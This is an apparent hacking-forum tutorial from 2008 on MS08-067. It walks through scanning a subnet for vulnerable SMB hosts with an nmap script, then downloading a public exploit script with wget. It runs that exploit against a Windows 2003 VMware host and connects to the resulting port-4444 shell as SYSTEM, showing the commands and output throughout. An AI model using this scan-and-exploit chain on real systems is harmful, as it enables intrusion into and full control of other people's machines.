So since some other people have posted some stuff on this exploit I figured I'd see what I could add. The first really cool thing I found (Thanks Arkaic)
was a script for nmap which checks for the vulnerability. If anyone is unfamiliar with the nmap scripting engine you are really missing out. Maybe if there is some demand we can do a write up on it later. So we need to check out a experimental branch on nmap in order to get the needed libraries for it to work. If your nmap breaks because of this its not my fault. Mine is fine so your should be as well. Ok here we go
Code:
b4cktr4ck3 / # svn co --username guest --password "" svn://svn.insecure.org/nmap-exp/ron
b4cktr4ck3 / # cd ron/nmap-smb
b4cktr4ck3 nmap-smb # ./configure
b4cktr4ck3 nmap-smb # make
b4cktr4ck3 nmap-smb # make install
Ok so all we did was rebuild nmap with a new branch. This actually gives us a bunch of new scripts to check out but for the sake of this post we will only use one. So now we can run a scan. The reason I searched this out is because the metasploit module to do the scan test (to my knowledge) only does one host at a time. I was looking to cover subnets if need be.

Okay so lets run our new script...
Code:
b4cktr4ck3 ron # nmap -T insane --script smb-check-vulns.nse  -p 445 192.168.1.0/24 

Starting Nmap 4.76 ( http://nmap.org ) at 2008-11-29 13:43 GMT
Interesting ports on firewall.localhost.com (192.168.1.1):
PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:1A:70:14:3A:E7 (Cisco-Linksys)

Interesting ports on 192.168.1.127:
PORT    STATE  SERVICE
445/tcp closed microsoft-ds

Interesting ports on 192.168.1.128:
PORT    STATE  SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:04:4B:18:69:8A (Nvidia)

Interesting ports on 192.168.1.237:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:4A:B6:6D (VMware)

Host script results:
|_ smb-check-vulns: This host is vulnerable to MS08-067

Nmap done: 256 IP addresses (4 hosts up) scanned in 2.59 seconds
As you can see we have a victim...er winner!

So just so this post wont be so short and lame we can also go ahead and see if we can pop this box. For this trick I'll go to milw0rm and grab a recent .py sploit on the subject.
Code:
b4cktr4ck3 / # wget http://www.milw0rm.com/exploits/download/7132.py
--13:45:35--  http://www.milw0rm.com/exploits/download/7132.py
           => `7132.py'
Resolving www.milw0rm.com... 76.74.9.18
Connecting to www.milw0rm.com|76.74.9.18|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]

    [ <=>                              ] 7,085         --.--K/s             

13:45:35 (233.53 KB/s) - `7132.py' saved [7085]
Ok so if you open up the exploit (which you should always do) and give it a quick read you will see there is a windows 2003 payload (#2) and a 2000 payload(#1) {thanks to TheX1le} so due to our scan results we are going to need 2003 so...
Code:
b4cktr4ck3 / # python 7132.py 192.168.1.237 2
#######################################################################
#   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
#   www.hackingspirits.com
#   www.coffeeandsecurity.com
#   Email: d3basis.m0hanty @ gmail.com
#######################################################################

[-]Windows 2003[SP2] payload loaded
[-]Initiating connection
[-]connected to ncacn_np:192.168.1.237[\pipe\browser]
[-]Exploit sent to target successfully...
[1]Telnet to port 4444 on target machine...
cool seems we have successfully "poped" the box so lets see...
Code:
b4cktr4ck3 / # telnet 192.168.1.237 4444
Trying 192.168.1.237...
Connected to 192.168.1.237.
Escape character is '^]'.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>
Very Nice!
Code:
C:\WINDOWS\system32>whoami
whoami
nt authority\system
Well thats it for this post. If you found any of this info helpful please let me know and I will post more how to's on this type of thing otherwise just tell me I suck and I'll go back to moderating with a iron fist